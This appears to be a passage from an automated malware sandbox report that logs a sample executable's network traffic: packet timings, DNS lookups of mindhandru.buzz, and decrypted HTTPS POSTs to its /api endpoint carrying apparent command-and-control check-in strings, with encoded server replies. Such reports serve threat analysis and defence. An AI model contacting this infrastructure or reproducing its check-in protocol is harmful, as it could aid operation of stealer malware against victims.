                                                                                                                                  Dec 27, 2024 08:41:51.309353113 CET44349718172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:51.309576035 CET49718443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:51.410651922 CET49718443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:51.410669088 CET44349718172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:51.411000013 CET44349718172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:51.412206888 CET49718443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:51.412230015 CET49718443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:51.412276983 CET44349718172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:52.092274904 CET44349718172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:52.092310905 CET44349718172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:52.092354059 CET44349718172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:52.092387915 CET44349718172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:52.092380047 CET49718443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:52.092407942 CET44349718172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:52.092427969 CET49718443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:52.092463970 CET44349718172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:52.092531919 CET49718443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:52.092549086 CET44349718172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:52.100547075 CET44349718172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:52.100619078 CET49718443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:52.100626945 CET44349718172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:52.108923912 CET44349718172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:52.109041929 CET49718443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:52.109051943 CET44349718172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:52.159367085 CET49718443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:52.211632967 CET44349718172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:52.253169060 CET49718443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:52.253184080 CET44349718172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:52.300071955 CET49718443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:52.302581072 CET44349718172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:52.306350946 CET44349718172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:52.306421041 CET49718443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:52.306428909 CET44349718172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:52.306453943 CET44349718172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:52.306512117 CET49718443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:52.306627035 CET49718443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:52.306643009 CET44349718172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:52.306655884 CET49718443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:52.306660891 CET44349718172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:52.487669945 CET49724443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:52.487704992 CET44349724172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:52.487771988 CET49724443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:52.488121033 CET49724443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:52.488135099 CET44349724172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:53.793948889 CET44349724172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:53.794022083 CET49724443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:53.795618057 CET49724443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:53.795625925 CET44349724172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:53.795936108 CET44349724172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:53.797108889 CET49724443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:53.797257900 CET49724443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:53.797286987 CET44349724172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:54.651523113 CET44349724172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:54.651619911 CET44349724172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:54.651704073 CET49724443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:54.652848959 CET49724443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:54.652858973 CET44349724172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:54.797808886 CET49730443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:54.797837019 CET44349730172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:54.797957897 CET49730443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:54.798233986 CET49730443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:54.798248053 CET44349730172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:56.055927038 CET44349730172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:56.056066990 CET49730443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:56.057389021 CET49730443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:56.057396889 CET44349730172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:56.057647943 CET44349730172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:56.058792114 CET49730443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:56.058897018 CET49730443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:56.058932066 CET44349730172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:41:56.058999062 CET49730443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:41:56.099339962 CET44349730172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:04.224590063 CET44349730172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:04.224680901 CET44349730172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:04.224790096 CET49730443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:04.224879026 CET49730443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:04.224899054 CET44349730172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:04.501157999 CET49752443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:04.501194000 CET44349752172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:04.501287937 CET49752443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:04.501656055 CET49752443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:04.501667976 CET44349752172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:05.806520939 CET44349752172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:05.806653976 CET49752443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:05.821322918 CET49752443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:05.821341991 CET44349752172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:05.821774006 CET44349752172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:05.830357075 CET49752443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:05.834202051 CET49752443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:05.834254026 CET44349752172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:05.836311102 CET49752443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:05.836322069 CET44349752172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:06.803530931 CET44349752172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:06.803630114 CET44349752172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:06.803682089 CET49752443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:06.803812981 CET49752443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:06.803824902 CET44349752172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:07.183773041 CET49758443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:07.183809042 CET44349758172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:07.183912039 CET49758443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:07.184220076 CET49758443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:07.184235096 CET44349758172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:08.404823065 CET44349758172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:08.405021906 CET49758443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:08.406277895 CET49758443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:08.406290054 CET44349758172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:08.406522036 CET44349758172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:08.407799006 CET49758443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:08.407891035 CET49758443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:08.407898903 CET44349758172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:09.163161039 CET44349758172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:09.163259029 CET44349758172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:09.163331032 CET49758443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:09.174583912 CET49758443192.168.2.9172.67.165.185
                                                                                                                                  Dec 27, 2024 08:42:09.174607038 CET44349758172.67.165.185192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:09.812335968 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:09.812386990 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:09.812484980 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:09.812946081 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:09.812958956 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:11.074026108 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:11.074170113 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.075985909 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.075994015 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:11.076328993 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:11.078022003 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.078941107 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.078974009 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:11.079063892 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.079094887 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:11.079195023 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.079236031 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:11.079344034 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.079360008 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:11.079484940 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.079510927 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:11.079637051 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.079668045 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.127331972 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:11.127470970 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.127521038 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.175333977 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:11.175549984 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.175595045 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.175609112 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.219338894 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:11.219520092 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.219562054 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.267332077 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:11.267560959 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.311327934 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:11.319086075 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:11.319173098 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:11.319215059 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:11.319264889 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:14.897113085 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:14.897351980 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:14.897418022 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:14.907864094 CET49763443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:14.907885075 CET44349763104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:14.919967890 CET49776443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:14.920001984 CET44349776104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:14.920072079 CET49776443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:14.920525074 CET49776443192.168.2.9104.21.11.101
                                                                                                                                  Dec 27, 2024 08:42:14.920541048 CET44349776104.21.11.101192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:15.831456900 CET49776443192.168.2.9104.21.11.101

                                                                                                                                  UDP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Dec 27, 2024 08:41:47.872272015 CET5656853192.168.2.91.1.1.1
                                                                                                                                  Dec 27, 2024 08:41:48.010066032 CET53565681.1.1.1192.168.2.9
                                                                                                                                  Dec 27, 2024 08:42:09.673590899 CET5184753192.168.2.91.1.1.1
                                                                                                                                  Dec 27, 2024 08:42:09.811343908 CET53518471.1.1.1192.168.2.9

                                                                                                                                  DNS Queries

                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                  Dec 27, 2024 08:41:47.872272015 CET192.168.2.91.1.1.10x8e2fStandard query (0)mindhandru.buzzA (IP address)IN (0x0001)false
                                                                                                                                  Dec 27, 2024 08:42:09.673590899 CET192.168.2.91.1.1.10x671aStandard query (0)mindhandru.buzzA (IP address)IN (0x0001)false

                                                                                                                                  DNS Answers

                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                  Dec 27, 2024 08:41:44.388967037 CET1.1.1.1192.168.2.90x6b78No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Dec 27, 2024 08:41:44.388967037 CET1.1.1.1192.168.2.90x6b78No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                  Dec 27, 2024 08:41:48.010066032 CET1.1.1.1192.168.2.90x8e2fNo error (0)mindhandru.buzz172.67.165.185A (IP address)IN (0x0001)false
                                                                                                                                  Dec 27, 2024 08:41:48.010066032 CET1.1.1.1192.168.2.90x8e2fNo error (0)mindhandru.buzz104.21.11.101A (IP address)IN (0x0001)false
                                                                                                                                  Dec 27, 2024 08:42:09.811343908 CET1.1.1.1192.168.2.90x671aNo error (0)mindhandru.buzz104.21.11.101A (IP address)IN (0x0001)false
                                                                                                                                  Dec 27, 2024 08:42:09.811343908 CET1.1.1.1192.168.2.90x671aNo error (0)mindhandru.buzz172.67.165.185A (IP address)IN (0x0001)false

                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                  • mindhandru.buzz

                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  0192.168.2.949712172.67.165.1854436492C:\Users\user\Desktop\zi042476Iv.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-27 07:41:49 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 8
                                                                                                                                  Host: mindhandru.buzz
                                                                                                                                  2024-12-27 07:41:49 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                  Data Ascii: act=life
                                                                                                                                  2024-12-27 07:41:49 UTC1129INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 27 Dec 2024 07:41:49 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Set-Cookie: PHPSESSID=ikua07r1skpnvhvsjcto7afdrt; expires=Tue, 22 Apr 2025 01:28:28 GMT; Max-Age=9999999; path=/
                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gi0zpP%2Bla%2B8lIk1lvOS7QgtMBd5BnfPjDd5G5sHRIBhUgTebbsVqGwS0bJcZBZpE8%2BPiYEjSl4RB2KfP2IkPWjTSAibxD%2BeVYcLd9EzZo%2BBuJCeJBbAqrDtsJnOIinIK%2FBk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f87aba08d67727b-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1795&min_rtt=1790&rtt_var=681&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=906&delivery_rate=1593886&cwnd=232&unsent_bytes=0&cid=a688892fbb2a2718&ts=750&x=0"
                                                                                                                                  2024-12-27 07:41:49 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                  Data Ascii: 2ok
                                                                                                                                  2024-12-27 07:41:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  1192.168.2.949718172.67.165.1854436492C:\Users\user\Desktop\zi042476Iv.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-27 07:41:51 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 53
                                                                                                                                  Host: mindhandru.buzz
                                                                                                                                  2024-12-27 07:41:51 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                  2024-12-27 07:41:52 UTC1125INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 27 Dec 2024 07:41:51 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Set-Cookie: PHPSESSID=nos2supr0khn3kd05du0a99qen; expires=Tue, 22 Apr 2025 01:28:30 GMT; Max-Age=9999999; path=/
                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ccKzlw0iGZz0zHnh5e%2BeCMmneRx0K3CwBPKNs1A0ypunm2Dx4Ibw5EyTXxIUV5n5hxtDMyZXPf8tzBhy%2FosVQNC8URpn%2FKalXNL9Fu21lgl6xBkH86E72b1Emnzzgcc%2FWk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f87abad7e8341e3-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1730&min_rtt=1695&rtt_var=660&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=952&delivery_rate=1722713&cwnd=218&unsent_bytes=0&cid=f4022f57c8a861f9&ts=788&x=0"
                                                                                                                                  2024-12-27 07:41:52 UTC244INData Raw: 34 39 31 63 0d 0a 39 53 53 4f 6a 39 79 41 45 59 53 71 63 68 6c 74 6a 51 73 48 51 6b 59 5a 4f 36 42 73 4d 63 6d 31 49 75 2b 74 4d 46 4c 74 34 52 57 4f 42 76 69 74 35 72 51 39 70 74 6b 58 4f 31 66 35 65 58 49 6e 61 6a 74 61 78 45 34 4c 72 39 52 4f 6e 4d 67 63 63 4a 75 4d 4e 38 39 43 37 2b 4f 76 35 54 32 6d 7a 77 6f 37 56 39 5a 77 4a 53 63 6f 4f 77 47 43 43 56 75 72 31 45 36 4e 7a 46 73 39 6e 59 31 32 6e 55 6a 70 35 37 6e 6a 64 65 58 47 48 33 77 49 36 47 70 74 4c 43 39 30 55 38 31 4f 48 65 76 51 57 4d 32 58 45 68 2b 49 6c 58 53 34 52 66 33 6b 2f 76 30 39 2f 34 67 58 64 30 2b 33 4b 57 59 6e 4a 48 56 64 78 41 64 5a 6f 64 31 47 6a 4d 6c 61 49 6f 53 48 66 5a 31 47 36 75 61 7a 36 6d 48 6f 7a 42 68 33 44 75 4a 71 4a 57 35 6b 66 45
                                                                                                                                  Data Ascii: 491c9SSOj9yAEYSqchltjQsHQkYZO6BsMcm1Iu+tMFLt4RWOBvit5rQ9ptkXO1f5eXInajtaxE4Lr9ROnMgccJuMN89C7+Ov5T2mzwo7V9ZwJScoOwGCCVur1E6NzFs9nY12nUjp57njdeXGH3wI6GptLC90U81OHevQWM2XEh+IlXS4Rf3k/v09/4gXd0+3KWYnJHVdxAdZod1GjMlaIoSHfZ1G6uaz6mHozBh3DuJqJW5kfE
                                                                                                                                  2024-12-27 07:41:52 UTC1369INData Raw: 47 43 56 68 50 34 35 55 4f 63 33 6b 63 39 6e 34 55 33 69 41 6a 31 72 62 6e 75 4d 37 36 49 47 48 63 42 36 6d 70 71 4a 79 56 37 53 38 30 4f 55 4b 50 66 52 49 66 41 58 54 2b 42 69 58 43 66 54 2b 76 69 75 65 70 31 36 63 74 51 4e 55 2f 6f 63 53 56 34 5a 46 74 4a 77 51 31 48 70 73 59 41 6b 6f 46 4c 63 49 69 50 4e 38 38 47 36 75 4f 2f 37 33 50 30 77 42 74 77 43 76 31 69 62 43 30 70 65 31 54 49 41 56 43 72 30 45 71 48 77 46 67 30 67 6f 35 78 6c 30 61 73 6f 2f 37 6c 61 36 61 51 55 46 67 4b 2f 32 35 70 4e 6d 5a 42 47 64 31 41 53 75 76 51 54 4d 32 58 45 6a 69 4b 67 48 53 63 53 65 2f 6c 74 66 42 7a 39 4d 34 64 66 68 33 70 62 47 73 71 4a 32 6c 54 7a 41 68 51 6f 74 78 4a 69 4d 68 57 63 4d 48 44 63 49 38 47 74 4b 32 66 37 33 6a 71 77 67 64 37 54 2f 41 6e 66 47 41 6a 64
                                                                                                                                  Data Ascii: GCVhP45UOc3kc9n4U3iAj1rbnuM76IGHcB6mpqJyV7S80OUKPfRIfAXT+BiXCfT+viuep16ctQNU/ocSV4ZFtJwQ1HpsYAkoFLcIiPN88G6uO/73P0wBtwCv1ibC0pe1TIAVCr0EqHwFg0go5xl0aso/7la6aQUFgK/25pNmZBGd1ASuvQTM2XEjiKgHScSe/ltfBz9M4dfh3pbGsqJ2lTzAhQotxJiMhWcMHDcI8GtK2f73jqwgd7T/AnfGAjd
                                                                                                                                  2024-12-27 07:41:52 UTC1369INData Raw: 63 70 74 73 41 77 34 39 56 4b 4d 2f 62 4e 37 31 46 2b 4f 36 30 6f 45 62 6c 78 68 35 38 47 61 39 32 4b 7a 6c 6b 66 46 57 43 56 68 4f 6d 31 6b 69 4c 33 56 30 39 6a 49 31 35 6d 45 50 6a 35 62 37 69 66 75 50 4d 47 33 41 4d 34 6d 31 33 4b 69 52 7a 58 4d 4d 45 57 65 75 5a 41 49 72 58 45 6d 6a 50 73 6d 43 63 42 4e 6e 75 73 4f 78 30 38 49 67 50 4e 52 61 76 62 6d 6c 67 66 44 74 55 79 67 74 57 70 4e 5a 4b 67 38 70 59 50 49 65 4e 64 49 56 4a 36 4f 32 79 36 6e 6e 72 78 68 52 7a 42 75 52 69 59 79 41 6c 63 52 6d 4d 54 6c 53 7a 6c 78 6a 4e 2b 31 55 38 67 6f 77 31 6f 6b 58 69 34 37 6e 30 4d 2f 6d 47 43 54 73 49 34 79 6b 39 59 43 68 79 57 63 6b 45 56 36 76 51 54 59 6a 4d 56 54 4f 43 68 48 32 5a 51 65 6a 68 74 2b 39 31 35 73 38 55 66 68 33 71 59 47 6b 73 5a 44 55 5a 78 52
                                                                                                                                  Data Ascii: cptsAw49VKM/bN71F+O60oEblxh58Ga92KzlkfFWCVhOm1kiL3V09jI15mEPj5b7ifuPMG3AM4m13KiRzXMMEWeuZAIrXEmjPsmCcBNnusOx08IgPNRavbmlgfDtUygtWpNZKg8pYPIeNdIVJ6O2y6nnrxhRzBuRiYyAlcRmMTlSzlxjN+1U8gow1okXi47n0M/mGCTsI4yk9YChyWckEV6vQTYjMVTOChH2ZQejht+915s8Ufh3qYGksZDUZxR
